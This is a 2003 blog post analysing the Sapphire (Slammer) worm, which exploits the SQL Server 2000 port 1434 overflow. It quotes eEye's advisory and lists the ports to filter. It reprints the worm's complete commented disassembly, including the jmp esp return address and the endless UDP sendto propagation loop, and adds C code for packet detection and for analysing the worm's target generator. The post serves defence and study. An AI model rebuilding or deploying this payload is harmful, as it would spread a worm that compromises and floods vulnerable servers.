Microsoft SQL Server 2000 pre SP3 :: Sapphire Worm Analysis


This is YAMSV (Yet Another Microsoft Security Vulnerability).

Goodness, did the MCSEs fall asleep at the switch or what? This vulnerability was discovered the year that Security became Microsoft's number one priority, and the patch was released last July, yet a functional exploit did not appear until now.

The latest attack was likely to revive debate within the technology industry about the need for an Internet-wide monitoring center, which the Bush administration has proposed.
What good is a centralized monitoring effort if a vulnerability like this can sweep across the internet in hours? By their own admission, the Service Pack was too large to be applied in any rapid reaction. Perhaps you see the following dialog:
"They're attacking, sir!" "How can you tell?" "Every MS SQL server that is internet attached has been rooted."

The question is: if everyone knew about the patch, why wasn't it applied? Incompetence, perhaps?
"experts" claim 'PATCHING NOT SO EASY'

Most patches require a simple download and restart of the computer. But this patch required manual editing of critical system files, something many administrators just aren’t comfortable doing.
Save us from the manual editing please!

eEye does a good job explaining the problem.
I recommend reading their analysis.

eEye Digital Security: SQL Sapphire Worm Analysis

[...] this worm [... takes] advantage of a known vulnerability that has had a patch available for many months.

The worm is spreading using a buffer overflow to exploit a flaw in Microsoft SQL Server 2000. The SQL 2000 server flaw was discovered in July, 2002 by Next Generation Security Software Ltd. The buffer overflow exists because of the way SQL improperly handles data sent to its Microsoft SQL Monitor port. Attackers leveraging this vulnerability will be executing their code as SYSTEM, since Microsoft SQL Server 2000 runs with SYSTEM privileges.

Corrective Action:
We recommend that people immediately firewall SQL service ports at all of their gateways. The worm uses only UDP port 1434 (SQL Monitor Port) to spread itself to a new system; however, it is safe practice to filter all SQL traffic at all gateways. The following is a list of SQL server ports:
ms-sql-s 1433/tcp #Microsoft-SQL-Server
ms-sql-s 1433/udp #Microsoft-SQL-Server
ms-sql-m 1434/tcp #Microsoft-SQL-Monitor
ms-sql-m 1434/udp #Microsoft-SQL-Monitor
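Filtering at the gateway is the right first step; what the filter does not tell you is whether someone is still trying. The following is an added example in C (mine, not eEye's code and not on the original post): a classifier for UDP datagrams addressed to port 1434 that flags, first, any 0x04 instance-name request whose name runs past the bound without a NUL terminator (an attempt on the overflow, whatever payload follows), and second, the Sapphire packet itself by its 0x04/0x01 prefix and the byte encoding of the `xor ecx, 9B040103h` instruction that appears in the disassembly below. The 32-byte name bound, the minimum 0x01 run and the byte offsets in the constructed sample datagram are assumptions; the sample is built inline, is not the worm, and carries no working payload.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SSRS_PORT            1434  /* SQL Server Resolution Service (SQL Monitor), UDP */
#define SSRS_CLNT_UCAST_INST 0x04  /* request: "which port does instance <name> use?"   */
#define SSRS_MAX_NAME        32    /* assumed bound on the instance name length         */
#define SAPPHIRE_PACKET_LEN  376   /* datagram size eEye reports for the worm           */

enum ssrs_verdict { SSRS_BENIGN = 0, SSRS_OVERFLOW_ATTEMPT = 1, SSRS_SAPPHIRE = 2 };

/* Byte encoding of "xor ecx, 9B040103h" from the disassembly: opcode 81 /6,
 * ModRM F1 selects ecx, then the immediate in little-endian order. */
static const uint8_t sapphire_xor_sig[] = { 0x81, 0xF1, 0x03, 0x01, 0x04, 0x9B };

static int has_bytes(const uint8_t *hay, size_t n, const uint8_t *needle, size_t m)
{
    for (size_t i = 0; m > 0 && i + m <= n; i++)
        if (memcmp(hay + i, needle, m) == 0)
            return 1;
    return 0;
}

/* Generic check: a 0x04 request whose name runs past the bound without a NUL
 * is malformed on purpose. Any such packet is an attempt on the overflow,
 * whether or not it carries Sapphire's code. */
int ssrs_overlong_instance_request(const uint8_t *p, size_t n)
{
    if (n < 2 || p[0] != SSRS_CLNT_UCAST_INST) return 0;
    if (n - 1 <= SSRS_MAX_NAME) return 0;               /* name fits the bound    */
    return memchr(p + 1, 0, SSRS_MAX_NAME + 1) == NULL; /* no terminator in range */
}

/* Specific check: the worm's request is 0x04, a run of 0x01 filler bytes, and
 * then its code, in which the xor sequence above is a fixed landmark. */
int sapphire_fingerprint(const uint8_t *p, size_t n)
{
    if (n < 16 || p[0] != SSRS_CLNT_UCAST_INST) return 0;
    size_t run = 0;
    while (1 + run < n && p[1 + run] == 0x01) run++;
    if (run < 8) return 0;                              /* assumed minimum filler */
    return has_bytes(p, n, sapphire_xor_sig, sizeof sapphire_xor_sig);
}

enum ssrs_verdict classify_udp_datagram(uint16_t dst_port, const uint8_t *p, size_t n)
{
    if (dst_port != SSRS_PORT || n == 0) return SSRS_BENIGN;
    if (sapphire_fingerprint(p, n)) return SSRS_SAPPHIRE;
    if (ssrs_overlong_instance_request(p, n)) return SSRS_OVERFLOW_ATTEMPT;
    return SSRS_BENIGN;
}

/* Constructed stand-in for the worm datagram, built from the first few
 * instruction encodings in the disassembly. It is not the worm and carries
 * no working payload; it exists only to exercise the checks above. */
size_t build_constructed_sapphire_like(uint8_t *buf, size_t cap)
{
    static const uint8_t head[] = {
        0x68, 0xDC, 0xC9, 0xB0, 0x42,        /* push 42B0C9DCh     */
        0xB8, 0x01, 0x01, 0x01, 0x01,        /* mov eax, 1010101h  */
        0x81, 0xF1, 0x03, 0x01, 0x04, 0x9B,  /* xor ecx, 9B040103h */
    };
    if (cap < SAPPHIRE_PACKET_LEN) return 0;
    memset(buf, 0x01, SAPPHIRE_PACKET_LEN);  /* 0x01 filler everywhere else */
    buf[0] = SSRS_CLNT_UCAST_INST;
    memcpy(buf + 98, head, sizeof head);     /* offset is illustrative      */
    return SAPPHIRE_PACKET_LEN;
}

int main(void)
{
    uint8_t buf[SAPPHIRE_PACKET_LEN];
    size_t n = build_constructed_sapphire_like(buf, sizeof buf);
    const uint8_t legit[] = { 0x04, 'M','S','S','Q','L','S','E','R','V','E','R', 0 };
    printf("constructed worm-like datagram: %d\n", classify_udp_datagram(SSRS_PORT, buf, n));
    printf("normal instance lookup:         %d\n", classify_udp_datagram(SSRS_PORT, legit, sizeof legit));
    return 0;
}
```

Feed it the UDP payloads from a capture of port 1434 traffic. The generic check is the one worth keeping after this worm is gone: any other exploit of the same flaw also has to send an oversized instance name, while the fingerprint only catches this one payload.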

Here's the down and nasty code disassembled.


;SAPPHIRE WORM CODE DISASSEMBLED
;eEye Digital Security: January 25, 2003
;
; The packet is 0x04 (SQL Monitor "instance name" request) followed by 0x01
; filler; the bytes below sit in the overflowed stack buffer and run once the
; overwritten return address sends execution to a "jmp esp" in sqlsort.dll.


push 42B0C9DCh ; [RET] sqlsort.dll -> jmp esp
mov eax, 1010101h ; Reconstruct session: after the overflow the payload buffer
; gets corrupted during program execution but before the
; payload is executed, so the 0x01 padding is rebuilt on the stack.
xor ecx, ecx
mov cl, 18h ; 0x18 dwords of 01010101h (mov cl avoids a NUL byte in the packet)

FIXUP:
push eax
loop FIXUP
xor eax, 5010101h ; eax = 04000000h: the byte at ebp+3 becomes the packet's leading 04
push eax
mov ebp, esp ; ebp = base for the strings and values pushed below
push ecx ; ecx is 0 here: NUL terminator for the first string
push 6C6C642Eh ; ".dll"
push 32336C65h ; "el32"
push 6E72656Bh ; "kern" -> "kernel32.dll" at [ebp-10h]
push ecx ; NUL
push 746E756Fh ; "ount"
push 436B6369h ; "ickC"
push 54746547h ; "GetT" -> "GetTickCount" at [ebp-20h]
mov cx, 6C6Ch ; "ll" plus two NUL bytes
push ecx
push 642E3233h ; "32.d"
push 5F327377h ; "ws2_" -> "ws2_32.dll" at [ebp-2Ch]
mov cx, 7465h ; "et"
push ecx
push 6B636F73h ; "sock" -> "socket" at [ebp-34h]
mov cx, 6F74h ; "to"
push ecx
push 646E6573h ; "send" -> "sendto" at [ebp-3Ch]
mov esi, 42AE1018h ; IAT entry in sqlsort.dll that holds LoadLibrary
lea eax, [ebp-2Ch] ; "ws2_32.dll"
push eax
call dword ptr [esi] ; LoadLibrary("ws2_32.dll")
push eax ; ws2_32 base address -> [ebp-40h]
lea eax, [ebp-20h] ; "GetTickCount" (second argument for GetProcAddress below)
push eax
lea eax, [ebp-10h] ; "kernel32.dll"
push eax
call dword ptr [esi] ; LoadLibrary("kernel32.dll")
push eax ; kernel32 base address (first argument for GetProcAddress)
mov esi, 42AE1010h ; IAT entry in sqlsort.dll expected to hold GetProcAddress
mov ebx, [esi]
mov eax, [ebx]
cmp eax, 51EC8B55h ; check entry point fingerprint: bytes 55 8B EC 51 are
; push ebp / mov ebp,esp / push ecx, the prologue of GetProcAddress
jz short VALID_GP ; If the fingerprint does not match, fall back to the
; GetProcAddress entry in another DLL version.
; Undetermined what DLL versions this will succeed on. Due
; to the lack of reliable importing this may not work across all
; DLL versions.
mov esi, 42AE101Ch ; IAT entry -> 77EA094C

VALID_GP:
call dword ptr [esi] ; GetProcAddress(kernel32, "GetTickCount")
call eax ; return from GetProcAddress = GetTickCount entry point; eax = tick count
xor ecx, ecx
push ecx ; sin_zero
push ecx ; sin_zero
push eax ; tick count -> [ebp-4Ch]: the PRNG seed, and also sin_addr
xor ecx, 9B040103h
xor ecx, 1010101h ; two xors so that no NUL byte appears in the packet
push ecx ; 9A050002 = port 1434 / AF_INET -> sockaddr_in starts at [ebp-50h]
lea eax, [ebp-34h] ; "socket"
push eax
mov eax, [ebp-40h] ; ws2_32 base address
push eax
call dword ptr [esi] ; GetProcAddress(ws2_32, "socket")
push 11h ; IPPROTO_UDP
push 2 ; SOCK_DGRAM
push 2 ; AF_INET
call eax ; socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)
push eax ; socket handle -> [ebp-54h]
lea eax, [ebp-3Ch] ; "sendto"
push eax
mov eax, [ebp-40h] ; ws2_32 base address
push eax
call dword ptr [esi] ; GetProcAddress(ws2_32, "sendto")
mov esi, eax ; save sendto -> esi
or ebx, ebx ; only sets flags; ebx still holds the pointer read from the IAT above
xor ebx, 0FFD9613Ch ; ebx = PRNG increment, so it depends on the kernel32.dll version

PRND:
mov eax, [ebp-4Ch] ; Pseudo Random Algorithm Start
lea ecx, [eax+eax*2] ; ecx = 3*eax
lea edx, [eax+ecx*4] ; edx = 13*eax
shl edx, 4 ; 208*eax
add edx, eax ; 209*eax
shl edx, 8 ; 53504*eax
sub edx, eax ; 53503*eax
lea eax, [eax+edx*4] ; eax = 214013*eax (the multiplier of Microsoft's C runtime rand())
add eax, ebx ; Pseudo Random Algorithm End: eax = eax*214013 + ebx
mov [ebp-4Ch], eax ; new state; this dword is also sin_addr of the sockaddr_in
push 10h ; sizeof(sockaddr_in)
lea eax, [ebp-50h] ; &sockaddr_in (AF_INET, port 1434, pseudo-random address)
push eax
xor ecx, ecx
push ecx ; flags = 0
xor cx, 178h ; 0x178 = 376 bytes
push ecx ; length
lea eax, [ebp+3] ; buffer: the worm's own packet, rebuilt on the stack
push eax
mov eax, [ebp-54h] ; socket handle
push eax
call esi ; sendto(sock, packet, 376, 0, &sockaddr_in, 16)
jmp short PRND ; Jump back to Pseudo Random Algorithm Start: send forever
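The PRND loop is the worm's entire targeting logic, and the seven lea/shl/add/sub instructions hide a familiar constant. The following is an added example in C, not eEye's code and not on the original page: it transcribes those instructions, shows the resulting recurrence eax = eax*214013 + ebx (214013 being the multiplier of Microsoft's C runtime rand()), decodes the 9A050002h sockaddr_in dword, and shows why the low byte of the state, which is also the first octet of the target address, cycles on its own. The seed and increment values in main are stand-ins; in the worm the seed is the GetTickCount result and the increment is the pointer read from sqlsort's IAT XORed with 0FFD9613Ch, so the increment, and in particular its parity, depends on the victim's kernel32.dll.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Multiplier the PRND loop computes with lea/shl/add/sub (see the
 * transcription below). 214013 is also the multiplier of MSVCRT rand(). */
#define SAPPHIRE_MUL 214013u

/* Step-by-step transcription of the seven instructions between
 * "mov eax,[ebp-4Ch]" and "add eax,ebx", to show what they compute. */
uint32_t sapphire_mul_as_disassembled(uint32_t eax)
{
    uint32_t ecx = eax + eax * 2;   /* lea ecx,[eax+eax*2] : 3a      */
    uint32_t edx = eax + ecx * 4;   /* lea edx,[eax+ecx*4] : 13a     */
    edx <<= 4;                      /* shl edx,4           : 208a    */
    edx += eax;                     /* add edx,eax         : 209a    */
    edx <<= 8;                      /* shl edx,8           : 53504a  */
    edx -= eax;                     /* sub edx,eax         : 53503a  */
    return eax + edx * 4;           /* lea eax,[eax+edx*4] : 214013a */
}

/* One iteration of the generator: eax = eax*214013 + ebx, mod 2^32.
 * In the worm the seed is the GetTickCount value stored at [ebp-4Ch] and the
 * increment is ebx = (IAT pointer) xor 0FFD9613Ch. */
uint32_t sapphire_next(uint32_t state, uint32_t increment)
{
    return state * SAPPHIRE_MUL + increment;
}

/* [ebp-4Ch] doubles as sin_addr of the sockaddr_in that starts at [ebp-50h].
 * sendto reads the four bytes in memory order, so the lowest byte of the
 * state is the first octet of the next victim's address. */
void sapphire_state_to_ip(uint32_t state, char out[16])
{
    snprintf(out, 16, "%u.%u.%u.%u",
             (unsigned)(state & 0xFFu), (unsigned)((state >> 8) & 0xFFu),
             (unsigned)((state >> 16) & 0xFFu), (unsigned)(state >> 24));
}

/* The dword 9A050002h pushed just below the seed is the start of that
 * sockaddr_in: sin_family = 2 (AF_INET), sin_port = bytes 05 9A = 1434. */
uint16_t sapphire_family_from_sockaddr_dword(uint32_t d)
{
    return (uint16_t)(d & 0xFFFFu);
}

uint16_t sapphire_port_from_sockaddr_dword(uint32_t d)
{
    return (uint16_t)((((d >> 16) & 0xFFu) << 8) | (d >> 24));
}

/* Because the modulus is 2^32, the low 8 bits of the state (the first
 * octet) evolve on their own as an 8-bit LCG. Count the steps until the
 * first octet returns to its starting value. With an odd increment the octet
 * runs through all 256 values; with an even one the octet's parity never
 * changes, so half of the /8 networks are never targeted by that host. */
unsigned sapphire_first_octet_period(uint32_t seed, uint32_t increment)
{
    uint8_t start = (uint8_t)(seed & 0xFFu);
    uint32_t s = seed;
    unsigned n = 0;
    do {
        s = sapphire_next(s, increment);
        n++;
    } while ((uint8_t)(s & 0xFFu) != start && n < 256);
    return n;
}

int main(void)
{
    char ip[16];
    uint32_t s = 0x0BADF00Du;   /* stand-in for the GetTickCount seed        */
    uint32_t inc = 2531011u;    /* stand-in for ebx; the real one is per host */
    for (int i = 0; i < 5; i++) {
        s = sapphire_next(s, inc);
        sapphire_state_to_ip(s, ip);
        printf("target %d: %s\n", i, ip);
    }
    printf("first-octet period, odd increment:  %u\n", sapphire_first_octet_period(1, 2531011u));
    printf("first-octet period, even increment: %u\n", sapphire_first_octet_period(1, 0));
    return 0;
}
```

The parity point is what matters for anyone modelling the scan: with an even ebx the low bit of the first octet is frozen at whatever the seed gave it, so alternate /8s never receive a packet from that host, and the share of the address space an infected machine can reach is decided by a DLL load address it never chose.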


1 Comment

Kenneth said:

There's a vulnerability scanner free for download:
Retina Sapphire SQL Worm Scanner from eEye Digital Security
They want an online form filled out, but if you're running a Microsoft shop I think their software bears serious investigation.

The Retina Sapphire SQL Worm Scanner is a tool created by eEye for scanning up to 254 IP addresses at once to determine if any are vulnerable to the Microsoft SQL buffer overflow vulnerability that the recent Sapphire Worm uses to propagate. If an IP address is found to be vulnerable to the MS SQL flaw, the Retina Sapphire SQL Worm Scanner will flag that address as vulnerable. Administrators can then double-click on the IP address for a link to a website with information on how to fix the vulnerability.

About this Entry

This page contains a single entry by klsh published on January 25, 2003 7:06 PM.
